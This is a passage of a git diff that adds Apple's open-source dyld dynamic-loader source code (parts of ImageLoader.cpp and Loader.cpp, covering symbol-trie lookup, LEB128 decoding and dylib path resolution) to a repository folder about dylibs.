(fgTotalBindImageSearches * 10) / fgTotalBindSymbolsResolved; + uint32_t avgInt = fgTotalBindImageSearches / fgTotalBindSymbolsResolved; + uint32_t avgTenths = avgTimesTen - (avgInt*10); + dyld::log("total binding symbol lookups: %s, average images searched per symbol: %u.%u\n", + commatize(fgTotalBindSymbolsResolved, commaNum1), avgInt, avgTenths); + } + printTime(" total binding fixups time", fgTotalBindTime, totalTime); + printTime(" total weak binding fixups time", fgTotalWeakBindTime, totalTime); + printTime(" total redo shared cached bindings time", fgTotalRebindCacheTime, totalTime); + dyld::log(" total bindings lazily fixed up: %s of %s\n", commatize(fgTotalLazyBindFixups, commaNum1), commatize(fgTotalPossibleLazyBindFixups, commaNum2)); + printTime(" total time in initializers and ObjC +load", fgTotalInitTime-fgTotalObjCSetupTime, totalTime); + for (uintptr_t 
i=0; i < timingInfo.count; ++i) { + uint64_t t = timingInfo.images[i].initTime; + if ( t*1000 < totalTime ) + continue; + dyld::log("%42s ", timingInfo.images[i].shortName); + if ( strncmp(timingInfo.images[i].shortName, "libSystem.", 10) == 0 ) + t -= fgTotalObjCSetupTime; + printTime("", t, totalTime); + } + +} + + +// +// copy path and add suffix to result +// +// /path/foo.dylib _debug => /path/foo_debug.dylib +// foo.dylib _debug => foo_debug.dylib +// foo _debug => foo_debug +// /path/bar _debug => /path/bar_debug +// /path/bar.A.dylib _debug => /path/bar.A_debug.dylib +// +void ImageLoader::addSuffix(const char* path, const char* suffix, char* result) +{ + strcpy(result, path); + + char* start = strrchr(result, '/'); + if ( start != NULL ) + start++; + else + start = result; + + char* dot = strrchr(start, '.'); + if ( dot != NULL ) { + strcpy(dot, suffix); + strcat(&dot[strlen(suffix)], &path[dot-result]); + } + else { + strcat(result, suffix); + } +} + + +// +// This function is the hotspot of symbol lookup. It was pulled out of findExportedSymbol() +// to enable it to be re-written in assembler if needed. 
+// +const uint8_t* ImageLoader::trieWalk(const uint8_t* start, const uint8_t* end, const char* s) +{ + //dyld::log("trieWalk(%p, %p, %s)\n", start, end, s); + ++fgSymbolTrieSearchs; + const uint8_t* p = start; + while ( p != NULL ) { + uintptr_t terminalSize = *p++; + if ( terminalSize > 127 ) { + // except for re-export-with-rename, all terminal sizes fit in one byte + --p; + terminalSize = read_uleb128(p, end); + } + if ( (*s == '\0') && (terminalSize != 0) ) { + //dyld::log("trieWalk(%p) returning %p\n", start, p); + return p; + } + const uint8_t* children = p + terminalSize; + if ( children > end ) { + dyld::log("trieWalk() malformed trie node, terminalSize=0x%lx extends past end of trie\n", terminalSize); + return NULL; + } + //dyld::log("trieWalk(%p) sym=%s, terminalSize=%lu, children=%p\n", start, s, terminalSize, children); + uint8_t childrenRemaining = *children++; + p = children; + uintptr_t nodeOffset = 0; + for (; childrenRemaining > 0; --childrenRemaining) { + const char* ss = s; + //dyld::log("trieWalk(%p) child str=%s\n", start, (char*)p); + bool wrongEdge = false; + // scan whole edge to get to next edge + // if edge is longer than target symbol name, don't read past end of symbol name + char c = *p; + while ( c != '\0' ) { + if ( !wrongEdge ) { + if ( c != *ss ) + wrongEdge = true; + ++ss; + } + ++p; + c = *p; + } + if ( wrongEdge ) { + // advance to next child + ++p; // skip over zero terminator + // skip over uleb128 until last byte is found + while ( (*p & 0x80) != 0 ) + ++p; + ++p; // skip over last byte of uleb128 + if ( p > end ) { + dyld::log("trieWalk() malformed trie node, child node extends past end of trie\n"); + return NULL; + } + } + else { + // the symbol so far matches this edge (child) + // so advance to the child's node + ++p; + nodeOffset = read_uleb128(p, end); + if ( (nodeOffset == 0) || ( &start[nodeOffset] > end) ) { + dyld::log("trieWalk() malformed trie child, nodeOffset=0x%lx out of range\n", nodeOffset); + return NULL; + 
} + s = ss; + //dyld::log("trieWalk() found matching edge advancing to node 0x%lx\n", nodeOffset); + break; + } + } + if ( nodeOffset != 0 ) + p = &start[nodeOffset]; + else + p = NULL; + } + //dyld::log("trieWalk(%p) return NULL\n", start); + return NULL; +} + + + +uintptr_t ImageLoader::read_uleb128(const uint8_t*& p, const uint8_t* end) +{ + uint64_t result = 0; + int bit = 0; + do { + if (p == end) + dyld::throwf("malformed uleb128"); + + uint64_t slice = *p & 0x7f; + + if (bit > 63) + dyld::throwf("uleb128 too big for uint64, bit=%d, result=0x%0llX", bit, result); + else { + result |= (slice << bit); + bit += 7; + } + } while (*p++ & 0x80); + return (uintptr_t)result; +} + + +intptr_t ImageLoader::read_sleb128(const uint8_t*& p, const uint8_t* end) +{ + int64_t result = 0; + int bit = 0; + uint8_t byte; + do { + if (p == end) + throw "malformed sleb128"; + byte = *p++; + result |= (((int64_t)(byte & 0x7f)) << bit); + bit += 7; + } while (byte & 0x80); + // sign extend negative numbers + if ( ((byte & 0x40) != 0) && (bit < 64) ) + result |= (~0ULL) << bit; + return (intptr_t)result; +} + +void ImageLoader::forEachReExportDependent( void (^callback)(const ImageLoader*, bool& stop)) const +{ + bool stop = false; + for (unsigned int i=0; i < libraryCount(); ++i) { + if ( libReExported(i) ) { + if ( ImageLoader* dependentImage = libImage(i) ) { + callback(dependentImage, stop); + } + } + if (stop) + break; + } +} + + +VECTOR_NEVER_DESTRUCTED_IMPL(ImageLoader::InterposeTuple); +VECTOR_NEVER_DESTRUCTED_IMPL(ImagePair); + + diff --git a/IV. Dylibs/macos/Loader.cpp b/IV. Dylibs/macos/Loader.cpp new file mode 100644 index 0000000..7a82aa9 --- /dev/null +++ b/IV. Dylibs/macos/Loader.cpp @@ -0,0 +1,3250 @@ +// Source (dyld-1125.5) : https://github.com/apple-oss-distributions/dyld/blob/main/dyld/Loader.cpp +/* + * Copyright (c) 2019 Apple Inc. All rights reserved. 
+ * @APPLE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this + * file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_LICENSE_HEADER_END@ + */ + +#include +#if !TARGET_OS_EXCLAVEKIT + #include + #include + #include + #include + #include + #include +#endif + +#include +#include + +#include "Defines.h" +#include "MachOAnalyzer.h" +#include "Loader.h" +#include "JustInTimeLoader.h" +#include "PrebuiltLoader.h" +#include "PremappedLoader.h" +#include "DyldRuntimeState.h" +#include "DyldProcessConfig.h" +#include "StringUtils.h" +#if BUILDING_DYLD && SUPPORT_ROSETTA + #include "RosettaSupport.h" +#endif +#include "Tracing.h" +#include "Utils.h" + +#ifndef VM_PROT_TPRO +#define VM_PROT_TPRO 0x200 +#endif + +#if !TARGET_OS_EXCLAVEKIT +#if __has_include() + #include + // this #define can be removed when rdar://92861504 is fixed + #ifndef MWL_MAX_REGION_COUNT + #define MWL_MAX_REGION_COUNT 5 + #endif +#else + struct mwl_region { + int mwlr_fd; /* fd of file file to over map */ + vm_prot_t mwlr_protections;/* protections for new overmapping */ + off_t mwlr_file_offset;/* offset in file of start of mapping */ + mach_vm_address_t mwlr_address; /* start address of existing region */ + mach_vm_size_t mwlr_size; 
/* size of existing region */ + }; + + #define MWL_INFO_VERS 7 + struct mwl_info_hdr { + uint32_t mwli_version; /* version of info blob, currently 7 */ + uint16_t mwli_page_size; /* 0x1000 or 0x4000 (for sanity checking) */ + uint16_t mwli_pointer_format; /* DYLD_CHAINED_PTR_* value */ + uint32_t mwli_binds_offset; /* offset within this blob of bind pointers table */ + uint32_t mwli_binds_count; /* number of pointers in bind pointers table (for range checks) */ + uint32_t mwli_chains_offset; /* offset within this blob of dyld_chained_starts_in_image */ + uint32_t mwli_chains_size; /* size of dyld_chained_starts_in_image */ + uint64_t mwli_slide; /* slide to add to rebased pointers */ + uint64_t mwli_image_address; /* add this to rebase offsets includes any slide */ + /* followed by the binds pointers and dyld_chained_starts_in_image */ + }; + #define MWL_MAX_REGION_COUNT 5 + extern int __map_with_linking_np(const struct mwl_region regions[], uint32_t regionCount, const struct mwl_info_hdr* blob, uint32_t blobSize); +#endif +#endif // !TARGET_OS_EXCLAVEKIT + +extern struct mach_header __dso_handle; + +// If a root is used that overrides a dylib in the dyld cache, dyld patches all uses of the dylib in the cache +// to point to the new dylib. But if that dylib is missing some symbol, dyld will patch other clients to point +// to BAD_ROOT_ADDRESS instead. That will cause a crash and the crash will be easy to identify in crash logs. 
+#define BAD_ROOT_ADDRESS 0xbad4007 + + +using dyld3::MachOAnalyzer; +using dyld3::MachOFile; +using dyld3::Platform; + +namespace dyld4 { + +Loader::InitialOptions::InitialOptions() + : inDyldCache(false) + , hasObjc(false) + , mayHavePlusLoad(false) + , roData(false) + , neverUnloaded(false) + , leaveMapped(false) + , roObjC(false) + , pre2022Binary(false) +{ +} + +Loader::InitialOptions::InitialOptions(const Loader& other) + : inDyldCache(other.dylibInDyldCache) + , hasObjc(other.hasObjC) + , mayHavePlusLoad(other.mayHavePlusLoad) + , roData(other.hasReadOnlyData) + , neverUnloaded(other.neverUnload) + , leaveMapped(other.leaveMapped) + , roObjC(other.hasReadOnlyObjC) + , pre2022Binary(other.pre2022Binary) +{ +} + +const char* Loader::path() const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->path(); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->path(); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->path(); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +const MachOFile* Loader::mf(RuntimeState& state) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->mf(state); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->mf(state); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->mf(state); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +#if SUPPORT_VM_LAYOUT +const MachOLoaded* Loader::loadAddress(RuntimeState& state) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->loadAddress(state); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return 
((PrebuiltLoader*)this)->loadAddress(state); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->loadAddress(state); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} +#endif + +#if SUPPORT_VM_LAYOUT +bool Loader::contains(RuntimeState& state, const void* addr, const void** segAddr, uint64_t* segSize, uint8_t* segPerms) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->contains(state, addr, segAddr, segSize, segPerms); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->contains(state, addr, segAddr, segSize, segPerms); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->contains(state, addr, segAddr, segSize, segPerms); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} +#endif + +bool Loader::matchesPath(const char* path) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->matchesPath(path); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->matchesPath(path); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->matchesPath(path); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +#if !SUPPORT_CREATING_PREMAPPEDLOADERS +FileID Loader::fileID(const RuntimeState& state) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->fileID(state); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->fileID(state); +} +#endif // !SUPPORT_CREATING_PREMAPPEDLOADERS + +uint32_t Loader::dependentCount() const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->dependentCount(); +#else +#if 
SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->dependentCount(); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->dependentCount(); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +Loader* Loader::dependent(const RuntimeState& state, uint32_t depIndex, DependentKind* kind) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->dependent(state, depIndex, kind); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->dependent(state, depIndex, kind); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->dependent(state, depIndex, kind); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +void Loader::loadDependents(Diagnostics& diag, RuntimeState& state, const LoadOptions& options) +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->loadDependents(diag, state, options); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->loadDependents(diag, state, options); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->loadDependents(diag, state, options); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +bool Loader::getExportsTrie(uint64_t& runtimeOffset, uint32_t& size) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->getExportsTrie(runtimeOffset, size); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->getExportsTrie(runtimeOffset, size); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->getExportsTrie(runtimeOffset, size); +#endif // 
SUPPORT_CREATING_PREMAPPEDLOADERS +} + +bool Loader::hiddenFromFlat(bool forceGlobal) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->hiddenFromFlat(forceGlobal); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->hiddenFromFlat(forceGlobal); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->hiddenFromFlat(forceGlobal); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +#if !SUPPORT_CREATING_PREMAPPEDLOADERS +bool Loader::representsCachedDylibIndex(uint16_t dylibIndex) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->representsCachedDylibIndex(dylibIndex); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->representsCachedDylibIndex(dylibIndex); +} + +bool Loader::overridesDylibInCache(const DylibPatch*& patchTable, uint16_t& cacheDylibOverriddenIndex) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->overridesDylibInCache(patchTable, cacheDylibOverriddenIndex); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->overridesDylibInCache(patchTable, cacheDylibOverriddenIndex); +} + +#endif // !SUPPORT_CREATING_PREMAPPEDLOADERS + +#if BUILDING_DYLD || BUILDING_UNIT_TESTS +void Loader::applyFixups(Diagnostics& diag, RuntimeState& state, DyldCacheDataConstLazyScopedWriter& dataConst, bool allowLazyBinds) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + ((PremappedLoader*)this)->applyFixups(diag, state, dataConst, allowLazyBinds); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + ((PrebuiltLoader*)this)->applyFixups(diag, state, dataConst, allowLazyBinds); 
+ else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + ((JustInTimeLoader*)this)->applyFixups(diag, state, dataConst, allowLazyBinds); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} +#endif // BUILDING_DYLD || BUILDING_UNIT_TESTS + +void Loader::withLayout(Diagnostics &diag, RuntimeState& state, void (^callback)(const mach_o::Layout &layout)) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + ((PremappedLoader*)this)->withLayout(diag, state, callback); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->withLayout(diag, state, callback); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->withLayout(diag, state, callback); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +bool Loader::dyldDoesObjCFixups() const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->dyldDoesObjCFixups(); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->dyldDoesObjCFixups(); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->dyldDoesObjCFixups(); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +const SectionLocations* Loader::getSectionLocations() const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->getSectionLocations(); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->getSectionLocations(); +} + +#if SUPPORT_IMAGE_UNLOADING +void Loader::unmap(RuntimeState& state, bool force) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->unmap(state, force); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->unmap(state, 
force); +} +#endif + + +bool Loader::hasBeenFixedUp(RuntimeState& state) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->hasBeenFixedUp(state); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->hasBeenFixedUp(state); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->hasBeenFixedUp(state); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + + +bool Loader::beginInitializers(RuntimeState& state) +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->beginInitializers(state); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->beginInitializers(state); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->beginInitializers(state); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +#if BUILDING_DYLD || BUILDING_UNIT_TESTS +void Loader::runInitializers(RuntimeState& state) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + ((PremappedLoader*)this)->runInitializers(state); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + ((PrebuiltLoader*)this)->runInitializers(state); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + ((JustInTimeLoader*)this)->runInitializers(state); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} +#endif + +const PrebuiltLoader* Loader::LoaderRef::loader(const RuntimeState& state) const +{ + if ( this->app ) + return state.processPrebuiltLoaderSet()->atIndex(this->index); + else + return state.cachedDylibsPrebuiltLoaderSet()->atIndex(this->index); +} + +const char* Loader::leafName(const char* path) +{ + if ( const char* lastSlash = strrchr(path, '/') ) + return lastSlash + 1; + else + return path; +} + +const char* 
Loader::leafName() const +{ + return leafName(path()); +} + +#if SUPPORT_VM_LAYOUT +const MachOAnalyzer* Loader::analyzer(RuntimeState& state) const +{ + return (MachOAnalyzer*)loadAddress(state); +} +#endif + +bool Loader::hasMagic() const +{ + return (this->magic == kMagic); +} + +void Loader::appendHexNibble(uint8_t value, char*& p) +{ + if ( value < 10 ) + *p++ = '0' + value; + else + *p++ = 'A' + value - 10; +} + +void Loader::appendHexByte(uint8_t value, char*& p) +{ + value &= 0xFF; + appendHexNibble(value >> 4, p); + appendHexNibble(value & 0x0F, p); +} + +void Loader::uuidToStr(uuid_t uuid, char uuidStr[64]) +{ + char* p = uuidStr; + appendHexByte(uuid[0], p); + appendHexByte(uuid[1], p); + appendHexByte(uuid[2], p); + appendHexByte(uuid[3], p); + *p++ = '-'; + appendHexByte(uuid[4], p); + appendHexByte(uuid[5], p); + *p++ = '-'; + appendHexByte(uuid[6], p); + appendHexByte(uuid[7], p); + *p++ = '-'; + appendHexByte(uuid[8], p); + appendHexByte(uuid[9], p); + *p++ = '-'; + appendHexByte(uuid[10], p); + appendHexByte(uuid[11], p); + appendHexByte(uuid[12], p); + appendHexByte(uuid[13], p); + appendHexByte(uuid[14], p); + appendHexByte(uuid[15], p); + *p = '\0'; +} + +void Loader::getUuidStr(RuntimeState& state, char uuidStr[64]) const +{ + uuid_t uuid; + if ( this->mf(state)->getUuid(uuid) ) { + uuidToStr(uuid, uuidStr); + } + else { + strlcpy(uuidStr, "no uuid", 64); + } +} + +void Loader::logLoad(RuntimeState& state, const char* path) const +{ + char uuidStr[64]; + this->getUuidStr(state, uuidStr); + state.log("<%s> %s\n", uuidStr, path); +} + +#if TARGET_OS_EXCLAVEKIT +const Loader* Loader::makePremappedLoader(Diagnostics& diag, RuntimeState& state, const char* path, const LoadOptions& options, const mach_o::Layout* layout) +{ + return PremappedLoader::makePremappedLoader(diag, state, path, options, layout); +} +#endif // !TARGET_OS_EXCLAVEKIT + +#if !TARGET_OS_EXCLAVEKIT +const Loader* Loader::makeDiskLoader(Diagnostics& diag, RuntimeState& state, const 
char* path, const LoadOptions& options, + bool overridesDyldCache, uint32_t dylibIndex, + const mach_o::Layout* layout) +{ + // never create a new loader in RTLD_NOLOAD mode + if ( options.rtldNoLoad ) + return nullptr; + + // don't use PrebuiltLoaders for simulator because the paths will be wrong (missing SIMROOT prefix) +#if SUPPORT_CREATING_PREBUILTLOADERS + // first check for a PrebuiltLoader + const Loader* result = (Loader*)state.findPrebuiltLoader(path); + if ( result != nullptr ) + return result; +#endif // SUPPORT_CREATING_PREBUILTLOADERS + + // The dylibIndex for a catalyst root might be wrong. This can happen if the dylib is found via its macOS path (ie from a zippered dylib) + // but getLoader() found the root in the /System/iOSSupport path + // In this case, we want to rewrite the dylib index to be to the catalyst unzippered twin, not the macOS one + if ( overridesDyldCache && state.config.process.catalystRuntime ) { + uint32_t dylibInCacheIndex; + if ( state.config.dyldCache.indexOfPath(path, dylibInCacheIndex) ) + dylibIndex = dylibInCacheIndex; + } + + // try building a JustInTime Loader + return JustInTimeLoader::makeJustInTimeLoaderDisk(diag, state, path, options, overridesDyldCache, dylibIndex, layout); +} + +const Loader* Loader::makeDyldCacheLoader(Diagnostics& diag, RuntimeState& state, const char* path, const LoadOptions& options, uint32_t dylibIndex, + const mach_o::Layout* layout) +{ + // never create a new loader in RTLD_NOLOAD mode + if ( options.rtldNoLoad ) + return nullptr; + +#if SUPPORT_CREATING_PREBUILTLOADERS + // first check for a PrebuiltLoader with compatible platform + // rdar://76406035 (simulator cache paths need prefix) + const PrebuiltLoader* result = state.findPrebuiltLoader(path); + if ( result != nullptr ) { + if ( result->mf(state)->loadableIntoProcess(state.config.process.platform, path, state.config.security.internalInstall) ) { + return result; + } + } +#endif // SUPPORT_CREATING_PREBUILTLOADERS + + // try building a 
JustInTime Loader + return JustInTimeLoader::makeJustInTimeLoaderDyldCache(diag, state, path, options, dylibIndex, layout); +} + +const Loader* Loader::makePseudoDylibLoader(Diagnostics& diag, RuntimeState &state, const char* path, const LoadOptions& options, const PseudoDylib* pd) { + return JustInTimeLoader::makePseudoDylibLoader(diag, state, path, options, pd); +} + +static bool isFileRelativePath(const char* path) +{ + if ( path[0] == '/' ) + return false; + if ( (path[0] == '.') && (path[1] == '/') ) + return true; + if ( (path[0] == '.') && (path[1] == '.') && (path[2] == '/') ) + return true; + return (path[0] != '@'); +} + +static bool mightBeInSharedCache(const char* dylibName) { + return ( (strncmp(dylibName, "/usr/lib/", 9) == 0) + || (strncmp(dylibName, "/System/Library/", 16) == 0) + || (strncmp(dylibName, "/System/iOSSupport/usr/lib/", 27) == 0) + || (strncmp(dylibName, "/System/iOSSupport/System/Library/", 34) == 0) + || (strncmp(dylibName, "/System/DriverKit/", 18) == 0) ); +} + + +// This composes DyldProcessConfig::forEachPathVariant() with Loader::forEachResolvedAtPathVar() +// They are separate layers because DyldProcessConfig handles DYLD_ env vars and Loader handle @ paths +void Loader::forEachPath(Diagnostics& diag, RuntimeState& state, const char* loadPath, const LoadOptions& options, + void (^handler)(const char* possiblePath, ProcessConfig::PathOverrides::Type type, bool&)) +{ + __block bool stop = false; + const ProcessConfig::PathOverrides& po = state.config.pathOverrides; + // (DYLD_FALLBACK_LIBRARY_PATH should only apply to dlopen() of leaf names) + bool skipFallbacks = !options.staticLinkage && (strchr(loadPath, '/') != nullptr) && (state.config.pathOverrides.getFrameworkPartialPath(loadPath) == nullptr); + po.forEachPathVariant(loadPath, state.config.process.platform, options.requestorNeedsFallbacks, skipFallbacks, stop, + ^(const char* possibleVariantPath, ProcessConfig::PathOverrides::Type type, bool&) { + #if !TARGET_OS_EXCLAVEKIT 
+ // relative name to dlopen() has special behavior + if ( !options.staticLinkage && (type == ProcessConfig::PathOverrides::Type::rawPath) && (loadPath[0] != '/') ) { + // if relative path, turn into implicit @rpath + if ( (loadPath[0] != '@') ) { + char implicitRPath[PATH_MAX]; + strlcpy(implicitRPath, "@rpath/", sizeof(implicitRPath)); + strlcat(implicitRPath, possibleVariantPath, sizeof(implicitRPath)); + Loader::forEachResolvedAtPathVar(state, implicitRPath, options, ProcessConfig::PathOverrides::Type::implictRpathExpansion, stop, handler); + if ( stop ) + return; + // always look in /usr/lib for leaf names + char implicitPath[PATH_MAX]; + strlcpy(implicitPath, "/usr/lib/", sizeof(implicitPath)); + strlcat(implicitPath, loadPath, sizeof(implicitPath)); + handler(implicitPath, ProcessConfig::PathOverrides::Type::standardFallback, stop); + if ( stop ) + return; + // only try cwd relative if afmi allows + if ( state.config.security.allowAtPaths ) { + handler(loadPath, type, stop); + } + // don't try anything else for dlopen of non-absolute paths + return; + } + } + // expand @ paths + Loader::forEachResolvedAtPathVar(state, possibleVariantPath, options, type, stop, handler); + #else + handler(possibleVariantPath, type, stop); + #endif // !TARGET_OS_EXCLAVEKIT + }); +} +#endif // !TARGET_OS_EXCLAVEKIT + +// +// Use PathOverrides class to walk possible paths, for each, look on disk, then in cache. +// Special case customer caches to look in cache first, to avoid stat() when result will be discarded. +// For dylibs loaded from disk, we need to know if they override something in the cache in order to patch it in.
+// It is considered an override if the initial path or path found is in the dyld cache +// +const Loader* Loader::getLoader(Diagnostics& diag, RuntimeState& state, const char* loadPath, const LoadOptions& options) +{ +#if TARGET_OS_EXCLAVEKIT + __block const Loader* result = nullptr; + // check if this path already in use by a Loader + for ( const Loader* ldr : state.loaded ) { + if ( !ldr->matchesPath(loadPath) ) + continue; + result = ldr; + if ( state.config.log.searching ) + state.log(" found: already-loaded-by-path: \"%s\"\n", loadPath); + } + + if ( result == nullptr ) + result = makePremappedLoader(diag, state, loadPath, options, nullptr); + + if ( (result == nullptr) && options.canBeMissing ) { + diag.clearError(); + } + + return result; +#else + __block const Loader* result = nullptr; + const DyldSharedCache* cache = state.config.dyldCache.addr; + const bool customerCache = (cache != nullptr) && !state.config.dyldCache.development; + if ( state.config.log.searching ) + state.log("find path \"%s\"\n", loadPath); + + const bool loadPathIsRPath = (::strncmp(loadPath, "@rpath/", 7) == 0); + const bool loadPathIsFileRelativePath = isFileRelativePath(loadPath); + + // for @rpath paths, first check if already loaded as rpath + if ( loadPathIsRPath ) { + for ( const Loader* ldr : state.loaded ) { + if ( ldr->matchesPath(loadPath) ) { + if ( state.config.log.searching ) + state.log(" found: already-loaded-by-rpath: %s\n", ldr->path()); + return ldr; + 